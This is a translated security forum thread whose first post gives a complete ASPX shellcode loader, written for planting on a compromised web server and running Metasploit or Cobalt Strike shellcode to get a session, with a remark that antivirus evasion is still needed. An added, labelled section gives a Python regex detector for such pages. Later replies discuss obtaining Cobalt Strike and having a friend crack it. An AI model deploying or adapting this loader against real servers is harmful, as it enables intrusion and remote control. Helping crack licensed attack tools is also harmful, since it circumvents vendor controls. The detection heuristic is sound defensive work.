Executing shellcode via ASPX

Persistence

#1

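Executing shellcode via ASPX
During a penetration test I ran into an ASPX one-liner webshell that could not execute commands (command execution was disabled on the system), and none of the many full-featured webshells I tried worked either. Then I figured that ASPX pages can be written in C#, and C# can execute shellcode, so I searched Baidu and found an article on executing shellcode from ASPX.
Combine it with shellcode generated by metasploit or cobaltstrike to get a session.
The code is as follows: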

<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
   
<script runat="server">
    delegate int MsfpayloadProc();
    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] codeBytes = { /* your shellcode */
                };
        IntPtr handle = IntPtr.Zero;
        handle = VirtualAlloc(
            IntPtr.Zero,
            codeBytes.Length,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);
        try
        {
            Marshal.Copy(codeBytes, 0, handle, codeBytes.Length);
            MsfpayloadProc msfpayload
               = Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc;
            msfpayload();
        }
        finally
        {
            VirtualFree(handle, 0, MEM_RELEASE);
        }
    }
    [DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")]
    public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect);
    [DllImport("Kernel32.dll", EntryPoint = "VirtualFree")]
    public static extern bool VirtualFree(IntPtr address, int size, uint freeType);
    const uint MEM_COMMIT = 0x1000;
    const uint MEM_RESERVE = 0x2000;
    const uint PAGE_EXECUTE_READWRITE = 0x40;
    const uint MEM_RELEASE = 0x8000;
</script>

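However, this method doesn't seem to get past antivirus out of the box; after all, the page is precompiled into a DLL first, and on a server with antivirus installed the compiled DLL is easily flagged. AV evasion work is needed.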
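
Added example, not part of the original thread: the page in post #1 is statically recognisable by the combination of a kernel32 P/Invoke, VirtualAlloc with executable protection, and a call through Marshal.GetDelegateForFunctionPointer. The Python heuristic below scores ASP.NET source files for that combination; the function names, weights, threshold and both sample pages are constructed for illustration.

```python
import re
from pathlib import Path

# Indicators come from the page in post #1; weights and threshold are assumptions.
INDICATORS = {
    "pinvoke_kernel32": (re.compile(r'DllImport\s*\(\s*"kernel32(\.dll)?"', re.I), 2),
    "virtualalloc":     (re.compile(r'\bVirtualAlloc(Ex)?\b'), 2),
    "exec_protection":  (re.compile(r'PAGE_EXECUTE_READWRITE|\b0x0*40\b', re.I), 2),
    "ptr_to_delegate":  (re.compile(r'GetDelegateForFunctionPointer'), 3),
    "marshal_copy":     (re.compile(r'Marshal\s*\.\s*Copy'), 1),
}
COMMENT = re.compile(r'/\*.*?\*/|//[^\n]*', re.S)
THRESHOLD = 7

def scan_aspx(source):
    """Return (score, sorted indicator names) for one source text, ignoring comments."""
    code = COMMENT.sub(" ", source)
    hits = sorted(n for n, (rx, _) in INDICATORS.items() if rx.search(code))
    return sum(INDICATORS[n][1] for n in hits), hits

def is_suspicious(source):
    # Require the call-through-pointer step so ordinary P/Invoke pages are not flagged.
    score, hits = scan_aspx(source)
    return score >= THRESHOLD and "ptr_to_delegate" in hits

def scan_tree(root):
    """Return sorted paths of .aspx/.ashx/.asmx files under root that match."""
    exts = {".aspx", ".ashx", ".asmx"}
    return sorted(str(p) for p in Path(root).rglob("*")
                  if p.suffix.lower() in exts and p.is_file()
                  and is_suspicious(p.read_text(errors="ignore")))

# Constructed samples: a loader-shaped page with an empty byte array, and a benign page.
LOADER_SAMPLE = r'''<%@ Page Language="C#" %>
<script runat="server">
  delegate int Proc();
  protected void Page_Load(object s, EventArgs e) {
    byte[] b = { };
    IntPtr h = VirtualAlloc(IntPtr.Zero, b.Length, 0x3000, 0x40);
    Marshal.Copy(b, 0, h, b.Length);
    ((Proc)Marshal.GetDelegateForFunctionPointer(h, typeof(Proc)))();
  }
  [DllImport("Kernel32.dll")] static extern IntPtr VirtualAlloc(IntPtr a, int n, uint t, uint p);
</script>'''
BENIGN_SAMPLE = r'''<%@ Page Language="C#" %>
<script runat="server">
  // VirtualAlloc and GetDelegateForFunctionPointer are only mentioned in this comment
  [DllImport("kernel32.dll")] static extern ulong GetTickCount64();
  protected void Page_Load(object s, EventArgs e) { Response.Write(GetTickCount64()); }
</script>'''
```

Source scanning of the web root complements the antivirus detection of the compiled DLL that the post mentions, since it can flag the file before the first request triggers compilation.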


#2

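Speaking of which, how do you download the cobaltstrike RAT…
I mean the latest version from the official site. I filled in random information and it doesn't seem to have worked; I want to download it and have a friend crack it.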


#3

I'm using 3.8, which is also old; I haven't applied for the new one. That application is damn hard.


#4

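I'm planning to ask a friend abroad to try :joy: and see whether it can be downloaded; I've heard that access fails whenever you use a Chinese IP.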


#5

It doesn't work when I access it from a machine abroad either...

